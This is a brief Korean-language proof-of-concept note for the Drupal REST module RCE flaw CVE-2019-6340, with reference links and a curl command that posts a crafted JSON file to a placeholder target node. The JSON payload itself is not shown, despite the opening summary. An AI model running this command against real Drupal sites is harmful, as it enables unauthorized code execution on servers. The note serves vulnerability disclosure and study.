
CVE-2019-6340에 대한 개념 증명 익스플로잇으로, Drupal의 RESTful 웹 서비스 모듈을 대상으로 하며 curl 기반 RCE 페이로드와 상세한 재현 단계를 포함합니다.
Drupal SA-CORE-2019-003 CVE-2019-6340
CVE-2019-6340.md https://mp.weixin.qq.com/s/EQD4-K6HgBY9wdzeXeyzkg
https://www.youtube.com/watch?v=QtLDDN0Duko
https://pbs.twimg.com/media/D0C-KiXX4AM2vR3.jpg:large
CVE-2019-6340는 기본 구성이 아닙니다. Restful 웹 서비스를 수동으로 활성화해야 합니다:

명령어 $ curl -k -v -H 'Content-Type: application/json' -d @./drupalrce.json 'https://<http://your.web.site >/node/<node_id>?_format=hal_json'
파일 drupalrce.json
